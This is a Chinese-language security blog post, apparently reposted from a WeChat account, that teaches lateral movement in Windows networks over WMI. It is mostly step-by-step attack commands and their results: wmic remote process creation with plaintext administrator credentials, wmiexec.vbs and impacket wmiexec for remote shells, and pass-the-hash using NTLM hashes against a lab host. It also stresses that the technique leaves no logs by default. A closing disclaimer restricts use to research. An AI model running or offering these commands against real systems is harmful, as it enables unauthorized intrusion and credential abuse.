WMI横向移动姿势

  • A+
所属分类:安全文章
WMI是Windows操作系统上WBEM和CIM标准的实现,允许用户、管理员和开发人员(包括攻击者)在操作系统中对各种托管组件进行遍历、操作和交互。具体而言,WMI提供了一个抽象的、统一的面向对象模型,从而不再需要直接与许多不相关的API进行交互 WMI的一个重要特性是能够使用DCOM或WinRM协议与远程机器的WMI模块进行交互。这样一来,就使得攻击者可以远程操作主机上的WMI类,而无需事先运行任何代码。




关于WMI的简要介绍




WMI 的全称是 Windows Management Instrumentation,它出现在所有的 Windows操作系统中,并由一组强大的工具集合组成,用于管理本地或远程的Windows系统,攻击者使用wmi来进行攻击,但 Windows 系统默认不会在日志中记录这些操作,可以做到无日志,攻击脚本无需写入到磁盘,增加了隐蔽性。推荐使用wmic进行远程执行命令。





wmic常用命令




    wmic useraccount WHERE "Name='%username%'" set PasswordExpires=false    //设置用户永不超期    wmic startup list brief                                                    //wmic获取自启信息    wmic volume list brief                                                    //wmic获取磁盘分区信息    wmic useraccount list full                                                //wmic获取用户信息    wmic service list full                                                    //wmic获取服务信息    wmic SERVICE where name="dhcp" call stopservice                            //wmic关闭服务    wmic DESKTOPMONITOR get ScreenHeight,ScreenWidth                        //wmic获取屏幕分辨率    wmic process where processid="3652" delete                                //wmic关闭进程    wmic process 2345 call terminate                                        //wmic关闭进程    wmic process where name="qq.exe" call terminate                            //wmic关闭进程    wmic qfe get Caption,Description,HotFixID,InstalledOn                    //wmic获取补丁安装时间    wmic process where name="ConsoleApplication.exe" get ExecutablePath        //查看进程的位置    wmic.exe /node:ip /user:localhostadministrator /password:"password" PROCESS call create "cmd /c whoami"    type \192.168.52.129c$Windowsres.dll                                    //远程命令执行    wmic qfe get hotfixid                                                    //查看补丁情况






WMI 利用条件




远程服务器启动Windows Management Instrumentation服务(默认开启)

135 端口未被过滤 [默认配置下目标主机防火墙开启将无法连接]

连接失败常见错误号:

WMI横向移动姿势


WMI横向移动姿势
列出远程主机进程
WMI横向移动姿势

可以看到列出了192.168.52.129这台主机的进程信息

wmic /node:192.168.52.129 /user:administrator /password:Password!! process list brief

WMI横向移动姿势

WMI横向移动姿势
远程创建进程
WMI横向移动姿势

可以看到在目标机器192.168.52.129成功执行了系统命令并输出到"tubai.txt",在目标指定目录可以发现文件。

wmic /node:192.168.52.129 /user:administrator /password:Password!! process call create "cmd.exe /c ipconfig > c:tubai.txt"

WMI横向移动姿势

WMI横向移动姿势






WMIEXEC工具






wmiexec.vbs

cscript wmiexec.vbs /shell 192.168.52.129 administrator Password!!

WMI横向移动姿势

WMI横向移动姿势

可以看到,我们得到了一个半交互式shell。





impacket套件




impacket套件是通过445端口进行通信的,不是135端口。我们这次用windows下的impacket,已经有前人把他转成exe了。

Windows下

 https://github.com/maaaaz/impacket-examples-windows
成功得到目标主机shell
WMI横向移动姿势
WMI横向移动姿势
wmiexec.exe administrator:Password[email protected]192.168.52.129

WMI横向移动姿势

哈希传递获得shell
WMI横向移动姿势
WMI横向移动姿势

当抓到的密码NTLM解不开咋办呢WMI横向移动姿势?老生常谈的问题了,我们也可以利用impacket中wmiexec达到哈希传递的效果来获得一个shell。

命令格式为:

wmiexec.exe -hashes LM哈希:NTLM哈希 域名/用户名@目标IP
wmiexec.exe -hashes e52cac67419a9a22a67a448822b50c99:2b07f7b579bb97532a9eb37753765d8f tubai/[email protected]168.52.129

WMI横向移动姿势

WMI横向移动姿势

可以看到成功得到了目标机器shell。

参考:

https://blog.csdn.net/qq_27446553/article/details/46008473

总结:

不失为一种内网横向移动的好方式。

声明:文章初衷仅为攻防研究学习交流之用,严禁利用相关技术去从事一切未经合法授权的入侵攻击破坏活动,因此所产生的一切不良后果与本文作者及该公众号无关。


分享收藏点赞在看



本文始发于微信公众号(贝塔安全实验室):WMI横向移动姿势

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: